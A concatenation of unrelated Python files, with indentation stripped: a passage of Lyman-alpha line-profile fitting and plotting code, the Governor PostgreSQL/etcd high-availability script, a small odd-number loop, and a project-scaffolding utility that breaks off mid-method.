lya_intrinsic_flux_exponent = float(("%e" % best_fit_flux).split('e')[1])
ax2.text(0.55,0.98,r'C II flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + \
'$^{+' + str(round((high_flux-best_fit_flux)/10**lya_intrinsic_flux_exponent,2)) + \
'}_{-' + str(round((best_fit_flux-low_flux)/10**lya_intrinsic_flux_exponent,2)) + \
'}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
verticalalignment='top',horizontalalignment='left',
transform=ax2.transAxes,fontsize=12., color='black')
ax2.text(0.97,0.93,r'erg cm$^{-2}$ s$^{-1}$',verticalalignment='top',horizontalalignment='right',
transform=ax2.transAxes,fontsize=12., color='black')
ax.step(wave_to_fit,flux_to_fit,'k',where='mid')
axx.step(wave_to_fit,flux_to_fit,'k',where='mid')
mask=[]
for i in range(len(wave_to_fit)):
if (i%5 == 0):
mask.append(i)
#short_wave = np.linspace(wave_to_fit[0],wave_to_fit[-1],25)
#error_bars_short = np.interp(short_wave,wave_to_fit,error_to_fit)
#short_flux = np.interp(short_wave,wave_to_fit,flux_to_fit)
short_wave = wave_to_fit[mask]
error_bars_short = error_to_fit[mask]
short_flux = flux_to_fit[mask]
ax.errorbar(short_wave,short_flux,yerr=error_bars_short,
fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
ax.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
axx.errorbar(short_wave,short_flux,yerr=error_bars_short,
fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
axx.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
#plot the intrinsic profile + components
#plot the intrinsic profile + components
narrow_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
variables['vs']['best'][0],
10**variables['am']['best'][0],
variables['fw']['best'][0],
single_component_flux=True,line_center=1334.532)
broad_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
variables['vs']['best'][0],
2.*(10**variables['am']['best'][0]),
variables['fw']['best'][0],
single_component_flux=True,line_center=1335.708)
lya_intrinsic_profile_bestfit = narrow_component + broad_component
narrow_component_convolved = np.convolve(narrow_component,resolution,mode='same')
ax.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
axx.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
broad_component_convolved = np.convolve(broad_component,resolution,mode='same')
ax.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
axx.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
lya_intrinsic_profile_bestfit_convolved = np.convolve(lya_intrinsic_profile_bestfit,resolution,mode='same')
ax.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
axx.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
#
# ax.step(wave_to_fit[mask],flux_to_fit[mask],'lightblue',linewidth=0.8) ## plotting "masked" region
ax.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
ax.minorticks_on()
axx.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
axx.minorticks_on()
ax.set_ylim([-np.max(flux_to_fit)/10.,np.max(lya_intrinsic_profile_bestfit_convolved)*1.1])
axx.set_ylim([-np.max(flux_to_fit)/100.,np.max(flux_to_fit)*0.1])
plt.ticklabel_format(useOffset=False)
residuals = (flux_to_fit - model_best_fit) / error_to_fit
chi2 = np.sum( residuals**2 )
dof = len(flux_to_fit) - ndim - 1
axxx.plot(wave_to_fit,residuals,'ko')
axxx.set_xlabel(r'Wavelength (\AA)',fontsize=14)
axxx.set_ylabel('Residuals',fontsize=14)
axxx.minorticks_on()
axxx.hlines(0,np.min(wave_to_fit),np.max(wave_to_fit),linestyle='--',color='grey')
axxx.hlines(1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
axxx.hlines(-1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
axxx.text(0.03,0.2,'$\\chi_{\\nu}^2$ = ' + str(round(chi2/dof,2)),verticalalignment='top',
horizontalalignment='left',transform=axxx.transAxes,fontsize=12., color='black')
if perform_error:
return low_flux, mid_flux, high_flux
######
######
def profile_rev(wave_to_fit, flux_to_fit, error_to_fit, resolution,
model_best_fit, lya_intrinsic_profile_mcmc, variables, param_order, samples = None,
perform_error=True, Voigt=False, Lorentzian=False, nbins=100, thin_out = 1.0):
f = plt.figure(figsize=(8,9))
plt.rc('text', usetex=True)
plt.rc('font', family='sans-serif', size=14)
gs = gridspec.GridSpec(3, 1, height_ratios=[3, 3, 1])
ax = plt.subplot(gs[0])
axx = plt.subplot(gs[1])
axxx = plt.subplot(gs[2])
fig_revs = plt.figure()
ax_rev = fig_revs.add_subplot(111)
if samples is not None:
ndim = len(samples[0])
#print ndim
if perform_error:
array_length = int(len(samples)/thin_out)
model_fits = np.zeros((array_length,len(wave_to_fit)))
intrinsic_profs = np.zeros((array_length,len(wave_to_fit)))
#SiIII_profs = np.zeros((array_length,len(wave_to_fit)))
rev_profs = np.zeros((array_length,len(wave_to_fit)))
lnprobs = np.zeros(array_length)
#for i, sample in enumerate(samples[np.random.randint(len(samples), size=10)]):
i=-1
for ll, sample in enumerate(samples):
if (ll % thin_out) == 0:
i += 1
theta_all = []
theta = []
j = 0
for p in param_order:
if variables[p]['vary']:
theta_all.append(sample[j])
theta.append(sample[j])
j = j+1
else:
theta_all.append(variables[p]['value'])
if True:
vs_i, am_i, fw_L_i, fw_G_i, h1_col_i, h1_b_i, h1_vel_i, d2h_i, vs_rev_i, am_rev_i, \
fw_rev_i = theta_all
line_center_i = vs_i/3e5*1215.67+1215.67
sigma_G_i = fw_G_i/3e5 * 1215.67 #/ 2.3548
if variables['fw_G']['fw_G_fw_L_fixed_ratio'] != 0:
if variables['fw_G']['fw_G_fw_L_fixed_ratio'] == -1:
sigma_L_i = fw_G_i * fw_L_i /3e5 * 1215.67 / 2.
else:
sigma_L_i = fw_G_i * variables['fw_G']['fw_G_fw_L_fixed_ratio'] /3e5 * 1215.67 / 2.
else:
sigma_L_i = fw_L_i/3e5 * 1215.67 #/ 2.
if Lorentzian:
voigt_profile_func_i = Lorentz1D(x_0 = line_center_i, amplitude = 10**am_i,
fwhm = sigma_L_i)
else:
voigt_profile_func_i = Voigt1D(x_0 = line_center_i, amplitude_L = 10**am_i,
fwhm_L = sigma_L_i, fwhm_G = sigma_G_i)
lya_intrinsic_profile = voigt_profile_func_i(wave_to_fit)
g_func = Gaussian1D(mean = vs_rev_i/3e5*1215.67+1215.67, amplitude=am_rev_i,stddev=fw_rev_i/3e5*1215.67/2.3548)
rev_profile = g_func(wave_to_fit)
lya_intrinsic_profile *= (rev_profile + 1.)
rev_profs[i,:] = rev_profile + 1.
intrinsic_profs[i,:] = np.convolve(lya_intrinsic_profile,resolution,mode='same')
total_attenuation = lyapy.total_tau_profile_func(wave_to_fit,
h1_col_i,h1_b_i,h1_vel_i,d2h_i)
model_fit = lyapy.damped_lya_profile_shortcut(wave_to_fit,resolution,
lya_intrinsic_profile, total_attenuation)/1e14
model_fits[i,:] = model_fit
#lnprobs[i] = lyapy.lnprob_voigt_rev(theta,wave_to_fit,flux_to_fit,error_to_fit,variables)
#max_lnprob_index = np.where(lnprobs == np.max(lnprobs))
#plt.plot(wave_to_fit,model_fit,'deeppink',linewidth=1., alpha=0.1)
if i%20 == 0:
ax.plot(wave_to_fit,model_fit,color='k',alpha=0.3)
ax_rev.plot(wave_to_fit,rev_profile + 1.,color='k',alpha=0.3)
sig2_low = np.zeros_like(wave_to_fit)
sig1_low = np.zeros_like(wave_to_fit)
median = np.zeros_like(wave_to_fit)
sig1_high = np.zeros_like(wave_to_fit)
sig2_high = np.zeros_like(wave_to_fit)
sig2_low_intr_prof = np.zeros_like(wave_to_fit)
sig1_low_intr_prof = np.zeros_like(wave_to_fit)
median_intr_prof = np.zeros_like(wave_to_fit)
sig1_high_intr_prof = np.zeros_like(wave_to_fit)
sig2_high_intr_prof = np.zeros_like(wave_to_fit)
sig2_low_rev_prof = np.zeros_like(wave_to_fit)
sig1_low_rev_prof = np.zeros_like(wave_to_fit)
median_rev_prof = np.zeros_like(wave_to_fit)
sig1_high_rev_prof = np.zeros_like(wave_to_fit)
sig2_high_rev_prof = np.zeros_like(wave_to_fit)
#sig2_low_intr = np.zeros_like(wave_to_fit)
#sig1_low_intr = np.zeros_like(wave_to_fit)
#median_intr = np.zeros_like(wave_to_fit)
#sig1_high_intr = np.zeros_like(wave_to_fit)
#sig2_high_intr = np.zeros_like(wave_to_fit)
#sig2_low_SiIII = np.zeros_like(wave_to_fit)
#sig1_low_SiIII = np.zeros_like(wave_to_fit)
#median_SiIII = np.zeros_like(wave_to_fit)
#sig1_high_SiIII = np.zeros_like(wave_to_fit)
#sig2_high_SiIII = np.zeros_like(wave_to_fit)
for i in np.arange(len(wave_to_fit)):
sig2_low[i], sig1_low[i], median[i], sig1_high[i], sig2_high[i] = \
np.percentile(model_fits[:,i], [2.5,15.9,50,84.1,97.5])
sig2_low_intr_prof[i], sig1_low_intr_prof[i], median_intr_prof[i], sig1_high_intr_prof[i], sig2_high_intr_prof[i] = \
np.percentile(intrinsic_profs[:,i], [2.5,15.9,50,84.1,97.5])
#sig2_low_SiIII_prof[i], sig1_low_SiIII_prof[i], median_SiIII_prof[i], sig1_high_SiIII_prof[i], sig2_high_SiIII_prof[i] = \
# np.percentile(SiIII_profs[:,i], [2.5,15.9,50,84.1,97.5])
sig2_low_rev_prof[i], sig1_low_rev_prof[i], median_rev_prof[i], sig1_high_rev_prof[i], sig2_high_rev_prof[i] = \
np.percentile(rev_profs[:,i], [2.5,15.9,50,84.1,97.5])
#low_intr[i], mid_intr[i], high_intr[i] = np.percentile(intrinsic_profs[:,i], [2.5,50,97.5])
#low_SiIII[i], mid_SiIII[i], high_SiIII[i] = np.percentile(SiIII_profs[:,i], [2.5, 50, 97.5])
ax.fill_between(wave_to_fit, sig2_low, sig2_high, color='lightgrey')
axx.fill_between(wave_to_fit, sig2_low, sig2_high, color='lightgrey')
ax.fill_between(wave_to_fit, sig1_low, sig1_high, color='grey')
axx.fill_between(wave_to_fit, sig1_low, sig1_high, color='grey')
ax.fill_between(wave_to_fit, sig2_low_intr_prof, sig2_high_intr_prof, color='lavenderblush')
axx.fill_between(wave_to_fit, sig2_low_intr_prof, sig2_high_intr_prof, color='lavenderblush')
ax.fill_between(wave_to_fit, sig1_low_intr_prof, sig1_high_intr_prof, color='lightpink')
axx.fill_between(wave_to_fit, sig1_low_intr_prof, sig1_high_intr_prof, color='lightpink')
reconstructed_flux = np.zeros(len(intrinsic_profs))
#SiIII_flux = np.zeros(len(intrinsic_profs))
for i,prof in enumerate(intrinsic_profs):
reconstructed_flux[i] = np.trapz(prof,wave_to_fit)
#SiIII_flux[i] = np.trapz(SiIII_profs[i],wave_to_fit)
#plt.histogram
sig2_low_intr, sig1_low_intr, median_intr, sig1_high_intr, sig2_high_intr = \
np.percentile(reconstructed_flux, [2.5,15.9,50,84.1,97.5])
#sig2_low_SiIII, sig1_low_SiIII, median_SiIII, sig1_high_SiIII, sig2_high_SiIII = \
# np.percentile(SiIII_flux, [2.5,15.9,50,84.1,97.5])
#import pdb; pdb.set_trace()
#for i in range(len(max_lnprob_index[0])):
#ax.plot(wave_to_fit,model_fits[max_lnprob_index[0][i],:],color='orange')
#axx.plot(wave_to_fit,model_fits[max_lnprob_index[0][i],:],color='orange')
f2 = plt.figure()
ax2 = f2.add_subplot(1,1,1)
n,bins,patches=ax2.hist(reconstructed_flux,bins=nbins)
ax2.vlines(sig2_low_intr,0,1.1*np.max(n),color='k',linestyle='--')
ax2.vlines(sig1_low_intr,0,1.1*np.max(n),linestyle='--',color='grey')
#ax2.vlines(mid_flux,0,1.1*np.max(n),color='k')
ax2.vlines(sig2_high_intr,0,1.1*np.max(n),color='k',linestyle='--')
ax2.vlines(sig1_high_intr,0,1.1*np.max(n),linestyle='--',color='grey')
ax2.set_xlabel('Ly$\\alpha$ flux (erg cm$^{-2}$ s$^{-1}$)')
ax2.minorticks_on()
best_fit_flux = np.trapz(lya_intrinsic_profile_mcmc,wave_to_fit)
ax2.vlines(best_fit_flux,0,1.1*np.max(n),color='r')
#ax2.vlines(np.trapz(intrinsic_profs[max_lnprob_index,:],wave_to_fit),0,1.1*np.max(n),color='orange')
lya_intrinsic_flux_argument = float(("%e" % best_fit_flux).split('e')[0])
lya_intrinsic_flux_exponent = float(("%e" % best_fit_flux).split('e')[1])
ax2.text(0.55,0.98,r'Ly$\alpha$ flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + \
'$^{+' + str(round((sig2_high_intr-best_fit_flux)/10**lya_intrinsic_flux_exponent,2)) + \
'}_{-' + str(round((best_fit_flux-sig2_low_intr)/10**lya_intrinsic_flux_exponent,2)) + \
'}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
verticalalignment='top',horizontalalignment='left',
transform=ax2.transAxes,fontsize=12., color='black')
ax2.text(0.97,0.93,r'erg cm$^{-2}$ s$^{-1}$',verticalalignment='top',horizontalalignment='right',
transform=ax2.transAxes,fontsize=12., color='black')
#f3 = plt.figure()
#ax3 = f3.add_subplot(1,1,1)
#n,bins,patches=ax3.hist(SiIII_flux,bins=nbins)
#ax3.vlines(sig2_low_SiIII,0,1.1*np.max(n),color='k',linestyle='--')
#ax2.vlines(mid_flux,0,1.1*np.max(n),color='k')
#ax3.vlines(sig2_high_SiIII,0,1.1*np.max(n),color='k',linestyle='--')
#ax3.set_xlabel('Si III flux (erg cm$^{-2}$ s$^{-1}$)')
#ax3.minorticks_on()
#ax3.set_title(str(sig2_low_SiIII) + ', ' + str(sig1_low_SiIII) + ', ' + str(median_SiIII) + ', ' + str(sig1_high_SiIII) + ', ' + str(sig2_high_SiIII))
#best_fit_flux = np.trapz(lya_intrinsic_profile_mcmc,wave_to_fit)
#ax2.vlines(best_fit_flux,0,1.1*np.max(n),color='r')
#lya_intrinsic_flux_argument = float(("%e" % best_fit_flux).split('e')[0])
#lya_intrinsic_flux_exponent = float(("%e" % best_fit_flux).split('e')[1])
#ax2.text(0.55,0.98,r'Ly$\alpha$ flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + \
# '$^{+' + str(round((high_flux-best_fit_flux)/10**lya_intrinsic_flux_exponent,2)) + \
# '}_{-' + str(round((best_fit_flux-low_flux)/10**lya_intrinsic_flux_exponent,2)) + \
# '}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
# verticalalignment='top',horizontalalignment='left',
# transform=ax2.transAxes,fontsize=12., color='black')
#ax2.text(0.97,0.93,r'erg cm$^{-2}$ s$^{-1}$',verticalalignment='top',horizontalalignment='right',
# transform=ax2.transAxes,fontsize=12., color='black')
ax.step(wave_to_fit,flux_to_fit,'k',where='mid')
axx.step(wave_to_fit,flux_to_fit,'k',where='mid')
mask=[]
for i in range(len(wave_to_fit)):
if (i%5 == 0):
mask.append(i)
#short_wave = np.linspace(wave_to_fit[0],wave_to_fit[-1],25)
#error_bars_short = np.interp(short_wave,wave_to_fit,error_to_fit)
#short_flux = np.interp(short_wave,wave_to_fit,flux_to_fit)
short_wave = wave_to_fit[mask]
error_bars_short = error_to_fit[mask]
short_flux = flux_to_fit[mask]
ax.errorbar(short_wave,short_flux,yerr=error_bars_short,
fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
ax.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
axx.errorbar(short_wave,short_flux,yerr=error_bars_short,
fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
axx.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
#plot the intrinsic profile + components
if not Voigt:
narrow_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
variables['vs_n']['best'][0],
10**variables['am_n']['best'][0],
variables['fw_n']['best'][0],
single_component_flux=True)
if not variables['am_b']['single_comp']:
broad_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
variables['vs_b']['best'][0],
10**variables['am_b']['best'][0],
variables['fw_b']['best'][0],
single_component_flux=True)
lya_intrinsic_profile_bestfit = narrow_component + broad_component
else:
lya_intrinsic_profile_bestfit = narrow_component
if variables['vs_haw']['HAW']:
haw_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
variables['vs_haw']['best'][0],
10**variables['am_haw']['best'][0],
variables['fw_haw']['best'][0],
single_component_flux=True)
lya_intrinsic_profile_bestfit += haw_component
narrow_component_convolved = np.convolve(narrow_component,resolution,mode='same')
ax.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
axx.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
if not variables['am_b']['single_comp']:
broad_component_convolved = np.convolve(broad_component,resolution,mode='same')
ax.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
axx.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
if variables['vs_haw']['HAW']:
haw_component_convolved = np.convolve(haw_component,resolution,mode='same')
ax.plot(wave_to_fit,haw_component_convolved,'c:',linewidth=0.7)
axx.plot(wave_to_fit,haw_component_convolved,'c:',linewidth=0.7)
else:
line_center_mle = variables['vs']['mle_best']/3e5*1215.67+1215.67
sigma_G_mle = variables['fw_G']['mle_best']/3e5 * 1215.67 #/ 2.3548
if variables['fw_G']['fw_G_fw_L_fixed_ratio'] != 0:
if variables['fw_G']['fw_G_fw_L_fixed_ratio'] == -1:
sigma_L_mle = variables['fw_G']['mle_best'] * variables['fw_L']['mle_best'] /3e5 * 1215.67 #/ 2.
else:
sigma_L_mle = variables['fw_G']['mle_best'] * variables['fw_G']['fw_G_fw_L_fixed_ratio'] /3e5 * 1215.67 #/ 2.
else:
sigma_L_mle = variables['fw_L']['mle_best']/3e5 * 1215.67 #/ 2.
if Lorentzian:
voigt_profile_func_mle = Lorentz1D(x_0 = line_center_mle, amplitude = 10**variables['am']['mle_best'],
fwhm = sigma_L_mle)
else:
voigt_profile_func_mle = Voigt1D(x_0 = line_center_mle, amplitude_L = 10**variables['am']['mle_best'],
fwhm_L = sigma_L_mle, fwhm_G = sigma_G_mle)
lya_intrinsic_profile_bestfit = voigt_profile_func_mle(wave_to_fit)
g_func = Gaussian1D(mean = variables['vs_rev']['mle_best']/3e5*1215.67+1215.67,
amplitude=variables['am_rev']['mle_best'], stddev=variables['fw_rev']['mle_best']/3e5*1215.67/2.3548)
rev_profile = g_func(wave_to_fit)
lya_intrinsic_profile_bestfit *= (rev_profile + 1.)
lya_intrinsic_profile_bestfit_convolved = np.convolve(lya_intrinsic_profile_bestfit,resolution,mode='same')
ax.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
axx.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
#
# ax.step(wave_to_fit[mask],flux_to_fit[mask],'lightblue',linewidth=0.8) ## plotting "masked" region
ax.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
ax.minorticks_on()
axx.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
axx.minorticks_on()
ax.set_ylim([-np.max(flux_to_fit)/10.,np.max(lya_intrinsic_profile_bestfit_convolved)*1.1])
axx.set_ylim([-np.max(flux_to_fit)/100.,np.max(flux_to_fit)*0.1])
plt.ticklabel_format(useOffset=False)
residuals = (flux_to_fit - model_best_fit) / error_to_fit
chi2 = np.sum( residuals**2 )
dof = len(flux_to_fit) - ndim - 1
axxx.plot(wave_to_fit,residuals,'ko')
axxx.set_xlabel(r'Wavelength (\AA)',fontsize=14)
axxx.set_ylabel('Residuals',fontsize=14)
axxx.minorticks_on()
axxx.hlines(0,np.min(wave_to_fit),np.max(wave_to_fit),linestyle='--',color='grey')
axxx.hlines(1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
axxx.hlines(-1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
axxx.text(0.03,0.2,'$\\chi_{\\nu}^2$ = ' + str(round(chi2/dof,2)),verticalalignment='top',
horizontalalignment='left',transform=axxx.transAxes,fontsize=12., color='black')
if perform_error:
LyA_intr_fluxes = np.transpose(np.array([sig2_low_intr, sig1_low_intr, median_intr, sig1_high_intr, sig2_high_intr]))
LyA_bestfit_models = np.transpose(np.array([sig2_low, sig1_low, median, sig1_high, sig2_high]))
#SiIII_fluxes = np.transpose([sig2_low_SiIII, sig1_low_SiIII, median_SiIII, sig1_high_SiIII, sig2_high_SiIII])
LyA_intr_profiles = np.transpose(np.array([sig2_low_intr_prof, sig1_low_intr_prof, median_intr_prof, sig1_high_intr_prof, sig2_high_intr_prof]))
#SiIII_profiles = np.transpose(np.array([sig2_low_SiIII_prof, sig1_low_SiIII_prof, median_SiIII_prof, sig1_high_SiIII_prof, sig2_high_SiIII_prof]))
rev_profiles = np.transpose(np.array([sig2_low_rev_prof, sig1_low_rev_prof, median_rev_prof, sig1_high_rev_prof, sig2_high_rev_prof]))
return LyA_intr_fluxes, LyA_bestfit_models, LyA_intr_profiles, rev_profiles
|
#!/usr/bin/env python
# Copyright 2014, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
|
#!/usr/bin/env python
import sys, os, yaml, time, urllib2, atexit, signal
import logging
from helpers.keystore import Etcd
from helpers.postgresql import Postgresql
from helpers.ha import Ha
from helpers.ascii import splash, showtime
LOG_LEVEL = logging.DEBUG if os.getenv('DEBUG', None) else logging.INFO
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s', level=LOG_LEVEL)
# load passed config file, or default
config_file = 'postgres0.yml'
if len(sys.argv) > 1:
config_file = sys.argv[1]
with open(config_file, "r") as f:
config = yaml.load(f.read())
# allow config setting from env, for docker
if os.getenv('GOVERNOR_ETCD_HOST'):
config['etcd']['host'] = os.getenv('GOVERNOR_ETCD_HOST')
if os.getenv('GOVERNOR_POSTGRESQL_NAME'):
config['postgresql']['name'] = os.getenv('GOVERNOR_POSTGRESQL_NAME')
if os.getenv('GOVERNOR_POSTGRESQL_CONNECT'):
config['postgresql']['connect'] = os.getenv('GOVERNOR_POSTGRESQL_CONNECT')
if os.getenv('GOVERNOR_POSTGRESQL_LISTEN'):
config['postgresql']['listen'] = os.getenv('GOVERNOR_POSTGRESQL_LISTEN')
if os.getenv('GOVERNOR_POSTGRESQL_READ_ONLY_PORT'):
config['postgresql']['read_only_port'] = os.getenv('GOVERNOR_POSTGRESQL_READ_ONLY_PORT')
if os.getenv('GOVERNOR_POSTGRESQL_DATA_DIR'):
config['postgresql']['data_dir'] = os.getenv('GOVERNOR_POSTGRESQL_DATA_DIR')
if os.getenv('GOVERNOR_POSTGRESQL_REPLICATION_NETWORK'):
config['postgresql']['replication']['network'] = os.getenv('GOVERNOR_POSTGRESQL_REPLICATION_NETWORK')
etcd = Etcd(config["etcd"])
postgresql = Postgresql(config["postgresql"])
ha = Ha(postgresql, etcd)
# leave things clean when shutting down, if possible
def shutdown(signal, frame):
logging.info("Governor Shutting Down: Received Shutdown Signal")
try:
if ha.has_lock():
logging.info("Governor Shutting Down: Abdicating Leadership")
etcd.abdicate(postgresql.name)
logging.info("Governor Shutting Down: Removing Membership")
etcd.delete_member(postgresql.name)
except:
logging.exception("Error during Abdication")
pass
logging.info("Governor Shutting Down: Stopping Postgres")
postgresql.stop()
sys.exit(0)
def graceful_reload(signal, frame):
logging.info("Governor Running: Received HUP Signal - Reloading")
postgresql.reload()
# atexit.register(shutdown)
signal.signal(signal.SIGTERM, shutdown)
signal.signal(signal.SIGHUP, graceful_reload)
# wait for etcd to be available
splash()
logging.info("Governor Starting up: Connect to Etcd")
etcd_ready = False
while not etcd_ready:
try:
etcd.touch_member(postgresql.name, postgresql.advertised_connection_string)
etcd_ready = True
except urllib2.URLError:
logging.info("waiting on etcd")
time.sleep(5)
# is data directory empty?
if postgresql.data_directory_empty():
logging.info("Governor Starting up: Empty Data Dir")
# racing to initialize
if etcd.race("/initialize", postgresql.name):
logging.info("Governor Starting up: Initialisation Race ... WON!!!")
logging.info("Governor Starting up: Initialise Postgres")
postgresql.initialize()
logging.info("Governor Starting up: Initialise Complete")
etcd.take_leader(postgresql.name)
logging.info("Governor Starting up: Starting Postgres")
postgresql.start(master=True)
else:
logging.info("Governor Starting up: Initialisation Race ... LOST")
time.sleep(20)
logging.info("Governor Starting up: Sync Postgres from Leader")
synced_from_leader = False
while not synced_from_leader:
leader = etcd.current_leader()
if not leader:
time.sleep(5)
continue
if postgresql.sync_from_leader(leader):
logging.info("Governor Starting up: Sync Completed")
postgresql.write_recovery_conf(leader)
logging.info("Governor Starting up: Starting Postgres")
postgresql.start(master=False)
synced_from_leader = True
else:
time.sleep(5)
else:
logging.info("Governor Starting up: Existing Data Dir")
postgresql.copy_pg_hba()
postgresql.follow_no_leader()
logging.info("Governor Starting up: Starting Postgres")
postgresql.start(master=False)
showtime()
logging.info("Governor Running: Starting Running Loop")
while True:
try:
logging.info("Governor Running: %s" % ha.run_cycle())
# create replication slots
if postgresql.is_leader():
logging.debug("Governor Running: I am the Leader")
for member in etcd.members():
member = member['hostname']
if member != postgresql.name:
postgresql.create_replication_slot(member)
etcd.touch_member(postgresql.name, postgresql.advertised_connection_string)
except SystemExit as e:
logging.info("Governor Shutting Down: Exiting Running Loop")
except Exception as e:
logging.exception("Unexpected error: %s" % e)
finally:
time.sleep(config["loop_wait"])
|
n = int(input("Digite o valor de n: "))
i = 0
while i < n:
print(2*i+1)
i = i + 1 |
# -*- coding: utf-8 -*-
"""Utility functions for mkpyproject
"""
from typing import Optional
import os
import re
from datetime import datetime
import logging
def _get_logger() -> logging.Logger:
"""Creates a logger
"""
logger = logging.getLogger(__name__)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("[%(asctime)s] %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
return logger
LOGGER = _get_logger()
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
FILES_DIR = os.path.join(FILE_DIR, "files")
def write_file(
dir_name: str,
file_name: str,
content: Optional[str] = None,
overwrite: bool = False,
):
"""Writes content to file.
Arguments
---------
dir_name: str
The directory of the file.
file_name: str
The name of the file (including extension).
content: str
The content of the file.
overwrite: bool
Overwrites file if it already exists, otherwise raises exception.
Raises
------
FileNotFoundError:
If the directory does not exist.
FileExistsError:
File exists and `overwrite` is False.
"""
LOGGER.info("Writing '%s/%s' with overwrite = %r", dir_name, file_name, overwrite)
if not os.path.exists(dir_name):
raise FileNotFoundError(f"Directory '{dir_name}' does not exist.")
file_dir = os.path.join(dir_name, file_name)
if os.path.exists(file_dir) and not overwrite:
raise ValueError(f"File '{file_dir}' exists and overwrite is turned off.")
content = content or ""
with open(file_dir, "w") as out:
out.write(content)
class PyProject:
"""Project class for creating predefined folders and writing files.
"""
def __init__(
self,
project_name: str,
author: Optional[str] = None,
verbose: Optional[int] = 0,
) -> None:
"""Initializes a project with a given name and author
Arguments
---------
project_name: str
Name of the python project.
author: str
Name of the project author.
verbose: int
Print additional output if `verbose > 0`.
"""
self.project_name = project_name
self.author = author
self.verbose = verbose
if verbose == 1:
LOGGER.setLevel(logging.INFO)
if verbose > 1:
LOGGER.setLevel(logging.DEBUG)
@property
def project_name_clean(self) -> str:
"""Converts project name to identifier if possible
"""
return re.sub("[ \-]", "_", self.project_name.lower())
def make_project_dirs(self) -> None:
"""Creates project directories.
Creates the project directories
"""
if not self.project_name_clean.isidentifier():
raise ValueError(
"Project name must fulfill PEP8"
" (`self.project_name.isidentifier() == True`)"
)
LOGGER.info("Creating '%s'.", self.project_name)
if not os.path.exists(self.project_name):
os.mkdir(self.project_name)
for dir_name in [self.project_name_clean, "tests"]:
this_dir = os.path.join(self.project_name, dir_name)
LOGGER.info("Creating '%s'.", this_dir)
os.mkdir(this_dir)
write_file(this_dir, "__init__.py")
for dir_name in ["notebooks", "docs"]:
this_dir = os.path.join(self.project_name, dir_name)
LOGGER.info("Creating '%s'.", this_dir)
os.mkdir(this_dir)
def write_license(
self, license_kind: str = "MIT", year: Optional[int] = None
) -> None:
"""Creates file 'LICENSE.md' in project root.
Imports information from 'files/LICENSE-{license_kind}.md' and substitudes
project author and year if possible.
Arguments
---------
license_kind: str
Kind of license. Currently only 'MIT' is implemented.
year: int
Year of the copyright. If `None` year will be the current year.
"""
if license_kind == "MIT":
with open(os.path.join(FILES_DIR, "LICENSE-MIT.md"), "r") as inp:
license_text = inp.read()
else:
raise ValueError("Unknown license '{license_kind}'.")
if self.author:
license_text = license_text.replace("{COPYRIGHT HOLDER}", self.author)
year = year or datetime.now().year
license_text = license_text.replace("{YEAR}", str(year))
write_file(self.project_name, "LICENSE.md", license_text)
def write_gitignore(self):
"""Creates file '.gitignore' in project root.
Imports information from 'files/.gitignore'.
"""
with open(os.path.join(FILES_DIR, ".gitignore"), "r") as inp:
gitignore_text = inp.read()
write_file(self.project_name, ".gitignore", gitignore_text)
def write_requirements(self):
"""Creates empty file 'requirements.txt' in project root.
"""
write_file(self.project_name, "requirements.txt")
def write_setup(self):
"""Creates file 'setup.py' in project root.
Imports information from 'files/setup.py' and substitudes project name and
author if possible.
"""
with open(os.path.join(FILES_DIR, "setup.py"), "r") as inp:
setup_text = inp.read()
setup_text = setup_text.replace(r"{project_name}", self.project_name)
setup_text = setup_text.replace(
r"{project_name_clean}", self.project_name_clean
)
setup_text = setup_text.replace("{author}", self.author or "None")
